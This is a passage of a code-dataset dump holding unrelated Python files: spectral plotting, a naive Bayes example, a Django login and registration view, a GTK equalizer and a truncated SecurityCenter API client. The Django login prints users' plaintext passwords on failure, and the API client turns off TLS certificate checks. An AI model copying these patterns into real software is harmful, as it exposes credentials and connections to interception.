np.arange(0.01, 1, 0.05)\n\n # Iterate over Cw values\n for i, Cbrown in enumerate(Cbrown_values):\n cnf_template_corn['Cbrown'] = Cbrown\n spc = p.run(cnf_template_corn)\n plt.plot(p.wl, spc, color=cmap(i / (len(Cbrown_values) - 1)))\n\n # Create a colorbar\n sm = plt.cm.ScalarMappable(cmap=cmap)\n sm.set_array(Cbrown_values)\n cbar = plt.colorbar(sm)\n cbar.set_label('Cbrown')\n plt.ylim((0, 0.3))\n plt.grid()\n plt.xlabel('Wavelengths (nm)')\n plt.ylabel('HDRF')\n #plt.title('Spectrum Plot')\n plt.savefig('Cbrown.jpg')\n #pdb.set_trace()\n\n #### LAI\n plt.figure()\n cmap = mcolors.LinearSegmentedColormap.from_list('custom_colormap', ['#00FF00', '#006400'])\n\n # Create a list of Cw values\n LAI_values = np.arange(1, 10, 0.5)\n\n # Iterate over Cw values\n for i, LAI in enumerate(LAI_values):\n cnf_template_corn['LAI'] = LAI\n spc = p.run(cnf_template_corn)\n plt.plot(p.wl, spc, color=cmap(i / (len(LAI_values) - 1)))\n\n # Create a colorbar\n sm = plt.cm.ScalarMappable(cmap=cmap)\n sm.set_array(LAI_values)\n cbar = plt.colorbar(sm)\n cbar.set_label('LAI')\n plt.ylim((0,0.3))\n plt.grid()\n plt.xlabel('Wavelengths (nm)')\n plt.ylabel('HDRF')\n #plt.title('Spectrum Plot')\n plt.savefig('LAI.jpg')\n print('done')\n pdb.set_trace()\n\n\n\n\n results = []\n for lidf, typename in zip([Planophile, Erectophile, Plagiophile, Extremophile, Spherical], ['Planophile', 'Erectophile', 'Plagiophile', 'Extremophile', 'Spherical']):\n cnf_template['LIDF'] = lidf\n spc = p.run(cnf_template)\n plt.plot(p.wl, spc, label=typename)\n results.append(spc)\n \n\n # get a single output:\n #profiler = cProfile.Profile()\n #profiler.enable()\n results1 = p.run(cnf_template)\n #profiler.disable()\n #profiler.print_stats()\n #p.run(1.5, 40, 8, 0, 0.01, 0.009, 1, 3, 0.01, 30, 10, 10, p.Planophile)\n #profile_result = cProfile.run('runit()', globals(), locals())\n #print(\"Method return value:\", profile_result)\n pdb.set_trace()\n \n cnf = cnf_template.copy()\n \n var_name = 'N'\n var_range = list(np.arange(0, 5, 0.1))\n #tto_range = list(np.arange(0, 20))\n results = []\n for val in var_range:\n cnf[var_name] = val\n print(cnf[var_name])\n results.append(p.run(cnf))\n\n\n wvs = p.wl\n results = np.array(results).T\n #cnfs = [cnf.update(tts=value) for value in np.arange(30, 60)]\n #plt.plot(wvs, results); plt.show()\n pdb.set_trace()\n try_rho = results[:, 0]\n brdf_adj = est_spec(try_rho, 2, 30, 5, 30, 50, 10)\n plt.plot(wvs, try_rho, wvs, brdf_adj); plt.show()\n #results = p.run(cnf)\n print(results)\n\n # Results ready for use with Py6S\n #results2 = p.run(1.5, 40, 8, 0, 0.01, 0.009, 1, 3, 0.01, 30, 10, 10, p.Planophile, Py6S=True)\n #print(results2)\n pdb.set_trace()\n\n # Use these results with Py6S by running something like:\n # s = SixS()\n # s.ground_reflectance = GroundReflectance.HomogeneousLambertian(results2)\n # s.run()\n\n\ndef runit(p):\n Planophile = (1, 0)\n cnf_template = {'N': 1.5, 'Cab': 40, 'Car': 8, 'Cbrown': 0, 'Cw': 0.01, \\\n 'Cm': 0.009, 'LAI': 1, 'psoil': 3, 'hspot': 0.01, 'tts': 30, 'tto':10, 'psi':10, 'LIDF': Planophile}\n return p.run(cnf_template)\n\n\ndef plotspc(results):\n plt.plot(results[:,0], results[:,1])\n return 1\n\n\n \n return wvs\n\nif __name__=='__main__': main()","sub_path":"example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":6970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"408731460","text":"\"\"\"这个例子将展示如何使用AODE分类器.\"\"\"\nimport pandas as pd\nimport classicML as cml\n\nDATASET_PATH = './datasets/西瓜数据集.csv'\nATTRIBUTE_NAME = ['脐部', '色泽', '根蒂', '敲声', '纹理', '触感', '密度', '含糖率']\n\n# 读取��据\ndataframe = pd.read_csv(DATASET_PATH, index_col=0, header=0)\nx = dataframe.iloc[:, :-1]\ny = dataframe.iloc[:, -1].values\ny[y == '是'] = 1\ny[y == '否'] = 0\n# 生成模型\nmodel = cml.AODE(attribute_name=ATTRIBUTE_NAME)\nmodel.compile(smoothing=True)\n# 训练模型\nmodel.fit(x, y)","sub_path":"examples/aode.py","file_name":"aode.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"640935044","text":"test_case = 1\nwhile True:\n dump = input()\n if not dump:\n break\n dump = int(dump)\n wall = list(map(int,input().split()))\n\n for _ in range(dump):\n wall.sort()\n wall[0] += 1\n wall[-1] -= 1\n print(f\"#{test_case} {wall[-1]-wall[0]}\")\n test_case += 1","sub_path":"python_workspace/coding_test/sw_expert_academy/Flatten.py","file_name":"Flatten.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"457539271","text":"from django.http import HttpResponse\r\nfrom django.shortcuts import render\r\nfrom navigation.models import Category\r\nfrom navigation.models import Page\r\nfrom navigation.forms import UserForm, UserProfileForm\r\nfrom django.shortcuts import redirect, reverse\r\nfrom django.contrib.auth import authenticate, login\r\nfrom django.contrib.auth.decorators import login_required\r\nfrom django.contrib.auth import logout\r\n\r\nfrom datetime import datetime\r\n\r\ndef index(request):\r\n # 查询数据库,获取目前存储的所有分类\r\n # 按点赞次数倒序排列分类\r\n # 获取前 5 个分类(如果分类数少于 5 个,那就获取全部)\r\n # 把分类列表放入 context_dict 字典\r\n # 稍后传给模板引擎\r\n category_list = Category.objects.order_by('-likes')[:5]\r\n context_dict = {'categories': category_list}\r\n # 渲染响应,发给客户端\r\n page_list = Page.objects.order_by('-views')[:5]\r\n context_dict[\"pages\"] = page_list\r\n response = render(request, 'navigation/index.html', context_dict)\r\n # 调用处理 cookie 的辅助函数\r\n visitor_cookie_handler(request, response)\r\n # 返回 response 对象,更新目标 cookie\r\n return response\r\n\r\ndef about(request):\r\n #return HttpResponse(\"龙腾测试!!! 首页\")\r\n return render(request, 'navigation/about.html')\r\n\r\n@login_required\r\ndef show_category(request, category_name_slug):\r\n # 创建上下文字典,稍后传给模板渲染引擎\r\n context_dict = {}\r\n try:\r\n # 能通过传入的分类别名找到对应的分类吗?\r\n # 如果找不到, .get() 方法抛出 DoesNotExist 异常\r\n # 因此 .get() 方法返回一个模型实例或抛出异常\r\n category = Category.objects.get(slug=category_name_slug)\r\n # 检索关联的所有网页\r\n # 注意, filter() 返回一个网页对象列表或空列表\r\n pages = Page.objects.filter(category=category)\r\n # 把得到的列表赋值给模板上下文中名为 pages 的键\r\n context_dict['pages'] = pages\r\n # 也把从数据库中获取的 category 对象添加到上下文字典中\r\n # 我们将在模板中通过这个变量确认分类是否存在\r\n context_dict['category'] = category\r\n except Category.DoesNotExist:\r\n # 没找到指定的分类时执行这里\r\n # 什么也不做\r\n # 模板会显示消息,指明分类不存在\r\n context_dict['category'] = None\r\n context_dict['pages'] = None\r\n # 渲染响应,返回给客户端\r\n return render(request, 'navigation/category.html', context_dict)\r\n\r\ndef register(request):\r\n # 一个布尔值,告诉模板注册是否成功\r\n # 一开始设为 False,注册成功后改为 True\r\n registered = False\r\n # 如果是 HTTP POST 请求,处理表单数据\r\n if request.method == 'POST':\r\n # 尝试获取原始表单数据\r\n # 注意, UserForm 和 UserProfileForm 中的数据都需要\r\n user_form = UserForm(data=request.POST)\r\n profile_form = UserProfileForm(data=request.POST)\r\n # 如果两个表单中的数据是有效的……\r\n if user_form.is_valid() and profile_form.is_valid():\r\n # 把 UserForm 中的数据存入数据库\r\n user = user_form.save()\r\n # 使用 set_password 方法计算密码哈希值\r\n # 然后更新 user 对象\r\n user.set_password(user.password)\r\n user.save()\r\n # 现在处理 UserProfile 实例\r\n # 因为要自行处理 user 属性,所以设定 commit=False\r\n # 延迟保存模型,以防出现完整性问题\r\n profile = profile_form.save(commit=False)\r\n profile.user = user\r\n # 用户提供头像了吗?\r\n # 如果提供了,��表单数据库中提取出来,赋给 UserProfile 模型\r\n if 'picture' in request.FILES:\r\n profile.picture = request.FILES['picture']\r\n # 保存 UserProfile 模型实例\r\n profile.save()\r\n # 更新变量的值,告诉模板成功注册了\r\n registered = True\r\n else:\r\n # 表单数据无效,出错了\r\n # 在终端打印问题\r\n print(user_form.errors, profile_form.errors)\r\n else:\r\n # 不是 HTTP POST 请求,渲染两个 ModelForm 实例\r\n # 表单为空,待用户填写\r\n user_form = UserForm()\r\n profile_form = UserProfileForm()\r\n # 根据上下文渲染模板\r\n return render(request,\r\n 'navigation/register.html',\r\n {'user_form': user_form,\r\n 'profile_form': profile_form,\r\n 'registered': registered})\r\n \r\n\r\ndef user_login(request):\r\n # 如果是 HTTP POST 请求,尝试提取相关信息\r\n if request.method == 'POST':\r\n # 获取用户在登录表单中输入的用户名和密码\r\n # 我们使用的是 request.POST.get('')\r\n # 而不是 request.POST['']\r\n # 这是因为对应的值不存在时,前者返回 None,\r\n # 而后者抛出 KeyError 异常\r\n username = request.POST.get('username')\r\n password = request.POST.get('password')\r\n # 使用 Django 提供的函数检查 username/password 是否有效\r\n # 如果有效,返回一个 User 对象\r\n user = authenticate(username=username, password=password)\r\n # 如果得到了 User 对象,说明用户输入的凭据是对的\r\n # 如果是 None( Python 表示没有值的方式),说明没找到与凭据匹配的用户\r\n if user:\r\n # 账户激活了吗?可能被禁了\r\n if user.is_active:\r\n # 登入有效且已激活的账户\r\n # 然后重定向到首页\r\n login(request, user)\r\n return redirect(reverse('index'))\r\n else:\r\n # 账户未激活,禁止登录\r\n return HttpResponse(\"Your Rango account is disabled.\")\r\n else:\r\n # 提供的登录凭据有问题,不能登录\r\n print(\"Invalid login details: {0}, {1}\".format(username, password))\r\n return HttpResponse(\"Invalid login details supplied.\")\r\n # 不是 HTTP POST 请求,显示登录表单\r\n # 极有可能是 HTTP GET 请求\r\n else:\r\n # 没什么上下文变量要传给模板系统\r\n # 因此传入一个空字典\r\n return render(request, 'navigation/login.html', {})\r\n\r\n# 使用 login_required() 装饰器限制\r\n# 只有已登录的用户才能访问这个视图\r\n@login_required\r\ndef user_logout(request):\r\n # 可以确定用户已登录,因此直接退出\r\n logout(request)\r\n # 把用户带回首页\r\n return redirect(reverse('index'))\r\n\r\n\r\ndef visitor_cookie_handler(request, response):\r\n # 获取网站的访问次数\r\n # 使用 COOKIES.get() 函数读取“visits”cookie\r\n # 如果目标 cookie 存在,把值转换为整数\r\n # 如果目标 cookie 不存在,返回默认值 1\r\n visits = int(request.COOKIES.get('visits', '1'))\r\n last_visit_cookie = request.COOKIES.get('last_visit', str(datetime.now()))\r\n last_visit_time = datetime.strptime(last_visit_cookie[:-7],'%Y-%m-%d %H:%M:%S')\r\n # 如果距上次访问已超过1s……\r\n if (datetime.now() - last_visit_time).seconds > 0:\r\n visits = visits + 1\r\n # 增加访问次数后更新“last_visit”cookie\r\n response.set_cookie('last_visit', str(datetime.now()))\r\n else:\r\n # 设定“last_visit”cookie\r\n response.set_cookie('last_visit', last_visit_cookie)\r\n # 更新或设定“visits”cookie\r\n response.set_cookie('visits', visits)","sub_path":"Chapter-08-code/first_project/navigation/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"99775303","text":"#!/usr/bin/env python\n#\n# gpaeq: GTK EQ editor for PulseAudio's EQ plugin\n# Copyright (C) 2014 Philippe Proulx \n#\n# D-bus communication and EQ computations inspired by Jason Newton's qpaeq; see\n# .\n# Copyright (C) 2009 Jason Newton \n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n\n\nfrom gi.repository import Gtk\nfrom gi.repository import Gdk\nfrom gi.overrides import Pango\nimport signal\nimport cairo\n\n\nclass SliderModel:\n def __init__(self, label, value, on_change):\n self._label = label\n self._value = value\n self._on_change = on_change\n self._scroll_incr = 0.01\n\n def set_label(self, label):\n self._label = label\n\n def get_label(self):\n return self._label\n\n def set_value(self, value):\n self._value = value\n if self._on_change:\n self._on_change()\n\n def set_scroll_incr(self, incr):\n self._scroll_incr = incr\n\n def get_scroll_incr(self):\n return self._scroll_incr\n\n def format_label(self):\n return self.get_label()\n\n def format_value(self):\n return '{:03}'.format(round(self.get_value() * 100))\n\n def get_value(self):\n return self._value\n\n def get_mid(self):\n return 0.5\n\n\nclass EqDbSliderModel(SliderModel):\n def __init__(self, hz, db_value, mindb, maxdb, on_change):\n self._mindb = mindb\n self._maxdb = maxdb\n self._hz = hz\n self._mid = EqDbSliderModel._db_value_to_value(0, mindb, maxdb)\n value = EqDbSliderModel._db_value_to_value(db_value, mindb, maxdb)\n SliderModel.__init__(self, str(hz), value, on_change)\n\n @staticmethod\n def _db_value_to_value(db_value, mindb, maxdb):\n return (db_value - mindb) / (maxdb - mindb)\n\n def get_db_value(self):\n return self.get_value() * (self._maxdb - self._mindb) + self._mindb\n\n def set_db_value(self, db_value):\n self.set_value(EqDbSliderModel._db_value_to_value(db_value, self._mindb, self._maxdb))\n\n def format_label(self):\n if self._hz < 1000:\n return str(int(self._hz))\n else:\n return '{:.1f}'.format(self._hz / 1000).rstrip('0').rstrip('.') + 'k'\n\n def format_value(self):\n db_value = self.get_db_value()\n ret = '{}{:.1f}'.format('+' if db_value >= 0 else '', db_value)\n return ret\n\n def get_mid(self):\n return self._mid\n\n\nclass Sliders(Gtk.DrawingArea):\n DEF_SLIDER_WIDTH = 35\n DEF_HANDLE_COLOR = (77 / 255, 224 / 255, 213 / 255)\n DEF_HANDLE_HOVER_COLOR = (214 / 255, 64 / 255, 72 / 255)\n DEF_SLIDER_BAR_COLOR = (0.35, 0.35, 0.35)\n DEF_SLIDER_BAR_HOVER_COLOR = (222 / 255, 96 / 255, 104 / 255)\n DEF_LABEL_COLOR = (0.8, 0.8, 0.8)\n DEF_VALUE_COLOR = (77 / 255, 224 / 255, 213 / 255)\n DEF_VERT_GUIDE_COLOR = (0.18, 0.18, 0.18)\n DEF_SLIDER_GUTTER = 2\n DEF_BORDER_WIDTH = 15\n INFO_HEIGHT = 27\n\n def __init__(self):\n self._pressed = False\n self._locked_x = None\n self._hover_slider_index = None\n self._sliders = []\n\n # default properties\n self._slider_width = Sliders.DEF_SLIDER_WIDTH\n self._handle_color = Sliders.DEF_HANDLE_COLOR\n self._handle_hover_color = Sliders.DEF_HANDLE_HOVER_COLOR\n self._slider_bar_color = Sliders.DEF_SLIDER_BAR_COLOR\n self._slider_bar_hover_color = Sliders.DEF_SLIDER_BAR_HOVER_COLOR\n self._slider_gutter = Sliders.DEF_SLIDER_GUTTER\n self._border_width = Sliders.DEF_BORDER_WIDTH\n self._label_color = Sliders.DEF_LABEL_COLOR\n self._value_color = Sliders.DEF_VALUE_COLOR\n self._vert_guide_color = Sliders.DEF_VERT_GUIDE_COLOR\n\n # precompute stuff\n self._precompute_stuff()\n\n # initialize drawing area\n Gtk.DrawingArea.__init__(self)\n\n # connect stuff\n self.add_events(Gdk.EventMask.BUTTON_PRESS_MASK)\n self.add_events(Gdk.EventMask.BUTTON_RELEASE_MASK)\n self.add_events(Gdk.EventMask.POINTER_MOTION_MASK)\n self.add_events(Gdk.EventMask.LEAVE_NOTIFY_MASK)\n self.add_events(Gdk.EventMask.ENTER_NOTIFY_MASK)\n self.add_events(Gdk.EventMask.POINTER_MOTION_MASK)\n self.add_events(Gdk.EventMask.SCROLL_MASK | Gdk.EventMask.SMOOTH_SCROLL_MASK)\n self.connect('draw', self._on_draw)\n self.connect('button-press-event', self._on_button_press)\n self.connect('button-release-event', self._on_button_release)\n self.connect('motion-notify-event', self._on_motion)\n self.connect('scroll-event', self._on_scroll)\n self.connect('enter-notify-event', self._on_enter)\n self.connect('leave-notify-event', self._on_leave)\n self.connect('configure-event', self._on_configure)\n\n def set_slider_width(self, width):\n if width < 1:\n raise RuntimeError('slider width < 1')\n self._slider_width = width\n self._precompute_stuff()\n self.queue_draw()\n\n def set_handle_color(self, color):\n self._handle_color = color\n self.queue_draw()\n\n def set_handle_hover_color(self, color):\n self._handle_hover_color = color\n self.queue_draw()\n\n def set_slider_bar_color(self, color):\n self._slider_bar_color = color\n self.queue_draw()\n\n def set_slider_bar_hover_color(self, color):\n self._slider_bar_hover_color = color\n self.queue_draw()\n\n def set_label_color(self, color):\n self._label_color = color\n self.queue_draw()\n\n def set_value_color(self, color):\n self._value_color = color\n self.queue_draw()\n\n def set_vert_guide_color(self, color):\n self._vert_guide_color = color\n self.queue_draw()\n\n def set_slider_gutter(self, gutter):\n if gutter < 0:\n raise RuntimeError('gutter width < 0')\n self._slider_gutter = gutter\n self._precompute_stuff()\n self.queue_draw()\n\n def set_border_width(self, width):\n if width < 0:\n raise RuntimeError('border width < 0')\n self._border_width = width\n self._precompute_stuff()\n self.queue_draw()\n\n def get_width_for_nb_sliders(self, nb):\n # width is: number of sliders * single slider width + borders\n return nb * self._slider_width + 2 * self._border_width\n\n def get_nb_fitting_sliders(self):\n alloc = self.get_allocation()\n width = alloc.width - 2 * self._border_width\n return width // self._slider_width\n\n def _get_size(self):\n # size allocated to me\n alloc = self.get_allocation()\n\n # width will depend on sliders in fact\n width = self._slider_width * len(self._sliders) + 2 * self._border_width\n height = (alloc.height // 2) * 2\n\n return width, height\n\n def _get_sliders_size(self):\n # total width/height\n width, height = self._get_size()\n\n # remove borders from width\n width -= 2 * self._border_width\n\n # remove borders from height\n height -= 2 * self._border_width\n\n # remove info from height\n height -= self._border_width\n height -= Sliders.INFO_HEIGHT\n\n return width, height\n\n def _get_slider_index_at_x(self, x):\n width, height = self._get_sliders_size()\n x = round(x)\n if x < 0 or x >= width:\n return None\n return x // self._slider_width\n\n def _get_slider_at_x(self, x):\n index = self._get_slider_index_at_x(x)\n return None if index is None else self._sliders[index]\n\n def set_sliders(self, sliders):\n self._sliders = sliders\n self.queue_draw()\n\n def _translate_xy(self, x, y):\n return x - self._border_width, y - self._border_width\n\n def _get_handle_width(self):\n return self._slider_width - self._slider_gutter\n\n def _get_handle_height(self):\n return round(self._get_handle_width() / 4)\n\n def _get_slider_bar_width(self):\n return round(self._get_handle_width() / 2)\n\n def _precompute_stuff(self):\n width, height = self._get_sliders_size()\n off = self._border_width\n hw = self._get_handle_width()\n hh = self._get_handle_height()\n self._handle_padding = round(hh / 2)\n self._mi = self._handle_padding + off\n self._ma = height - self._handle_padding + off\n self._mid = round((height / 2) + off)\n self._sbw = self._get_slider_bar_width()\n self._offset_sb = round((hw - self._sbw) / 2)\n\n def _draw_slider(self, cr, slider_index):\n # size\n width, height = self._get_sliders_size()\n\n # hover?\n is_hover = False\n if self._hover_slider_index is not None:\n is_hover = (slider_index == self._hover_slider_index)\n\n # colors\n hfg = self._handle_color\n hhfg = self._handle_hover_color\n sbg = self._slider_bar_color\n sbhg = self._slider_bar_hover_color\n lfg = self._label_color\n vfg = self._value_color\n vgfg = self._vert_guide_color\n\n # handle dimensions\n hw = self._get_handle_width()\n hh = self._get_handle_height()\n\n # get slider\n slider = self._sliders[slider_index]\n\n # get X\n x = self._border_width + self._slider_width * slider_index\n\n # center and top Y of handle\n ma_mi_diff = self._ma - self._mi\n center_y = self._ma - round(slider.get_value() * ma_mi_diff)\n top_y = center_y - self._handle_padding\n\n # vertical guide\n cr.set_source_rgb(vgfg[0], vgfg[1], vgfg[2])\n cr.set_line_width(1)\n nx = x + round(hw / 2)\n cr.move_to(nx, self._mi)\n cr.line_to(nx, self._ma)\n cr.stroke()\n\n # slider bar\n mid = self._ma - round(slider.get_mid() * ma_mi_diff)\n cr.set_source_rgb(sbg[0], sbg[1], sbg[2])\n if is_hover:\n cr.set_source_rgb(sbhg[0], sbhg[1], sbhg[2])\n cr.rectangle(x + self._offset_sb, mid, self._sbw, center_y - mid)\n cr.fill()\n\n # handle\n cr.set_source_rgb(hfg[0], hfg[1], hfg[2])\n if is_hover:\n cr.set_source_rgb(hhfg[0], hhfg[1], hhfg[2])\n cr.rectangle(x, top_y, hw, hh)\n cr.fill()\n\n # label\n cr.select_font_face('sans-serif')\n cr.set_font_size(9)\n cr.move_to(x + 1, height + 3 * self._border_width)\n cr.set_source_rgb(lfg[0], lfg[1], lfg[2])\n cr.show_text(slider.format_label())\n\n # value\n value = slider.format_value()\n cr.select_font_face('Fixed', cairo.FONT_SLANT_NORMAL,\n cairo.FONT_WEIGHT_NORMAL)\n cr.set_font_size(9)\n cr.set_source_rgb(vfg[0], vfg[1], vfg[2])\n if is_hover:\n cr.set_source_rgb(hhfg[0], hhfg[1], hhfg[2])\n cr.move_to(x + 1, height + 3 * self._border_width + 12)\n cr.show_text(value)\n\n def _draw_sliders(self, cr, clip_rect):\n # do we even have sliders?\n if len(self._sliders) == 0:\n return\n\n # now we will only redraw the sliders that are affected by the clip region\n clip_x = clip_rect.x\n clip_w = clip_rect.width\n t_x = clip_x - self._border_width\n if t_x < 0:\n first_index = 0\n else:\n first_index = self._get_slider_index_at_x(t_x)\n last_index = self._get_slider_index_at_x(t_x + clip_w - 1)\n if last_index is None:\n last_index = len(self._sliders) - 1\n indexes = range(first_index, last_index + 1)\n\n # draw\n for slider_index in indexes:\n self._draw_slider(cr, slider_index)\n\n def _on_draw(self, drawing_area, cr):\n do_draw, clip_rect = Gdk.cairo_get_clip_rectangle(cr)\n if not do_draw:\n return False\n\n self._draw_sliders(cr, clip_rect)\n\n return False\n\n def _update_slider_at_pos(self, x, y):\n width, height = self._get_sliders_size()\n padding = self._get_handle_height() / 2\n x = round(x)\n y = round(y)\n mi = padding\n ma = height - padding\n if x < 0 or x >= width:\n return\n if y < mi:\n y = mi\n if y >= ma:\n y = ma\n\n # set slider's new value\n value = (ma - y) / (ma - mi)\n slider = self._get_slider_at_x(x)\n slider.set_value(value)\n\n def _redraw_slider_index(self, index):\n width, height = self._get_size()\n clip_x = self._border_width + index * self._slider_width\n clip_w = self._slider_width\n self.queue_draw_area(clip_x, 0, clip_w, height)\n\n def _on_button_press(self, widget, ev):\n x, y = self._translate_xy(ev.x, ev.y)\n if ev.button != 1:\n return\n self._locked_x = None\n if ev.state & Gdk.ModifierType.CONTROL_MASK:\n self._locked_x = x\n self._pressed = True\n self._update_slider_at_pos(x, y)\n index = self._get_slider_index_at_x(x)\n if index is not None:\n self._redraw_slider_index(index)\n\n def _on_button_release(self, widget, ev):\n if ev.button != 1:\n return\n x, y = self._translate_xy(ev.x, ev.y)\n self._locked_x = None\n self._pressed = False\n index = self._get_slider_index_at_x(x)\n if index is not None:\n self._redraw_slider_index(index)\n\n def _on_motion(self, widget, ev):\n x, y = self._translate_xy(ev.x, ev.y)\n if self._locked_x:\n x = self._locked_x\n cur_slider_index = self._get_slider_index_at_x(x)\n if cur_slider_index is None:\n if self._hover_slider_index is not None:\n self._redraw_slider_index(self._hover_slider_index)\n self._hover_slider_index = None\n return\n if self._hover_slider_index is not None:\n if cur_slider_index != self._hover_slider_index:\n # undraw old hover\n self._redraw_slider_index(self._hover_slider_index)\n self._hover_slider_index = None\n\n # update value?\n if self._pressed:\n self._update_slider_at_pos(x, y)\n\n # redraw slider\n self._hover_slider_index = cur_slider_index\n self._redraw_slider_index(cur_slider_index)\n\n def _on_scroll(self, widget, ev):\n y_scroll = ev.get_scroll_deltas()[2]\n x, y = self._translate_xy(ev.x, ev.y)\n slider = self._get_slider_at_x(x)\n if slider is None:\n return\n value = slider.get_value()\n if y_scroll < 0:\n value += slider.get_scroll_incr()\n if value > 1:\n value = 1\n elif y_scroll > 0:\n value -= slider.get_scroll_incr()\n if value < 0:\n value = 0\n slider.set_value(value)\n index = self._get_slider_index_at_x(x)\n if index is not None:\n self._redraw_slider_index(index)\n\n def _on_configure(self, widget, ev):\n self._precompute_stuff()\n\n def _on_enter(self, widget, ev):\n pass\n\n def _on_leave(self, widget, ev):\n if self._pressed:\n return\n if self._hover_slider_index is not None:\n self._redraw_slider_index(self._hover_slider_index)\n self._hover_slider_index = None\n\n\nclass EqWindow(Gtk.Window):\n INITIAL_NB_SLIDERS = 16\n GUTTER = 15\n MIN_HEIGHT = 300\n DEF_SLIDERS_BG_COLOR = (0.1, 0.1, 0.1)\n\n def __init__(self):\n # init parent window\n Gtk.Window.__init__(self, title=\"gpaeq\")\n\n # UI and stuff\n self._make_me_nice()\n self._init_ui()\n\n # signals\n self._on_resize_handle = self.connect('check-resize', self._on_resize)\n\n def _make_me_nice(self):\n self.set_position(Gtk.WindowPosition.CENTER)\n self.set_border_width(EqWindow.GUTTER)\n self.set_icon_from_file('res/equalizer.png')\n\n def _init_ui(self):\n # vbox for top and bottom\n self._vbox = Gtk.VBox(homogeneous=False, spacing=EqWindow.GUTTER)\n self.add(self._vbox)\n\n # init sliders\n self._init_top()\n self._init_bottom()\n\n def _init_top(self):\n # box\n self._top_hbox = Gtk.HBox(homogeneous=False, spacing=EqWindow.GUTTER)\n self._vbox.pack_start(self._top_hbox, False, False, 0)\n\n # list of sinks\n self._init_sinks_combo()\n\n def _init_bottom(self):\n # box for preamp and EQ sliders\n self._sliders_ev_box = Gtk.EventBox()\n self._sliders_hbox = Gtk.HBox(homogeneous=False, spacing=0)\n self._sliders_ev_box.add(self._sliders_hbox)\n def_color = EqWindow.DEF_SLIDERS_BG_COLOR\n bg_color = Gdk.Color(red=def_color[0] * 65535,\n blue=def_color[1] * 65535,\n green=def_color[2] * 65535)\n self._sliders_ev_box.modify_bg(Gtk.StateType.NORMAL, bg_color)\n self._vbox.pack_start(self._sliders_ev_box, True, True, 0)\n\n # init sliders\n self._init_preamp_slider()\n self._init_eq_sliders()\n\n def _init_sinks_combo(self):\n # label\n lbl = Gtk.Label(label='Sink:')\n lbl.modify_font(Pango.FontDescription('sans-serif 9'))\n self._top_hbox.pack_start(lbl, False, False, 0)\n\n # combo\n self._sinks_store = Gtk.ListStore(str)\n self._sinks_store.append(['alsa_output.pci-0000_01_00.1.hdmi-stereo'])\n self._sinks_store.append(['alsa_output.pci-0000_00_14.2.analog-stereo'])\n self._sinks_combo = Gtk.ComboBox.new_with_model(self._sinks_store)\n renderer_text = Gtk.CellRendererText()\n self._sinks_combo.modify_font(Pango.FontDescription('sans-serif 8'))\n self._sinks_combo.pack_start(renderer_text, True)\n self._sinks_combo.add_attribute(renderer_text, \"text\", 0)\n self._sinks_combo.set_active(0)\n self._top_hbox.pack_start(self._sinks_combo, False, False, 0)\n\n def _init_preamp_slider(self):\n self._preamp_sliders = Sliders()\n preamp_slider = EqDbSliderModel(0, 0, -12, 12, lambda: None)\n preamp_slider.set_scroll_incr(0.005)\n sliders_width = self._preamp_sliders.get_width_for_nb_sliders(1)\n self._preamp_sliders.set_sliders([preamp_slider])\n self._preamp_sliders.set_size_request(sliders_width, EqWindow.MIN_HEIGHT)\n self._sliders_hbox.pack_start(self._preamp_sliders, False, True, 0)\n\n def _init_eq_sliders(self):\n self._eq_sliders = Sliders()\n sliders = self._new_sliders(EqWindow.INITIAL_NB_SLIDERS)\n sliders_width = self._eq_sliders.get_width_for_nb_sliders(EqWindow.INITIAL_NB_SLIDERS)\n self._eq_sliders.set_sliders(sliders)\n self._eq_sliders.set_size_request(sliders_width, EqWindow.MIN_HEIGHT)\n self._sliders_hbox.pack_start(self._eq_sliders, True, True, 0)\n\n def _new_sliders(self, nb):\n sliders = []\n for i in range(nb):\n slider = EqDbSliderModel(i / nb * 20000, 0, -12, 12, lambda: None)\n slider.set_scroll_incr(0.005)\n sliders.append(slider)\n return sliders\n\n def _on_resize(self, window):\n nb_sliders = self._eq_sliders.get_nb_fitting_sliders()\n sliders = self._new_sliders(nb_sliders)\n self._eq_sliders.set_sliders(sliders)\n\n\ndef main():\n # enable Ctrl+C\n signal.signal(signal.SIGINT, signal.SIG_DFL)\n\n # main app\n win = EqWindow()\n win.connect('delete-event', Gtk.main_quit)\n win.show_all()\n Gtk.main()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"gpaeq.py","file_name":"gpaeq.py","file_ext":"py","file_size_in_byte":20155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"57139124","text":"import json\nimport sys\nimport requests\nimport pprint\nimport urllib\n\nrequests.packages.urllib3.disable_warnings()\n\n\nclass SecurityCenterAPI: \n url = \"https://10.14.226.13\"\n username = \"\"\n password = \"\"\n token = ''\n cookie = ''\n\n def __init__(self): \n self.data = {}\n \n def set_url(self, url):\n self.url = url\n\t\t\n def build_url(self, restCall):\n \"\"\" Formats the SC URL with the rest API call\"\"\"\n return '{0}{1}'.format(self.url, restCall)\n\n def connect(self, method, resource, data=None, headers=None, cookies=None):\n \"\"\" The connect method is used to connect to SC and pass our API calls.\"\"\"\n if headers is None:\n headers = {'Content-type': 'application/json',\n 'X-SecurityCenter': str(self.token)}\n if data is not None:\n data = json.dumps(data)\n\n if method == \"POST\":\n r = requests.post(self.build_url(resource), data=data, headers=headers, cookies=self.cookie,\n verify=False)\n elif method == \"DELETE\":\n r = requests.delete(self.build_url(resource), data=data, headers=headers, cookies=self.cookie,\n verify=False)\n elif method == 'PATCH':\n r = requests.patch(self.build_url(resource), data=data, headers=headers, cookies=self.cookie,\n 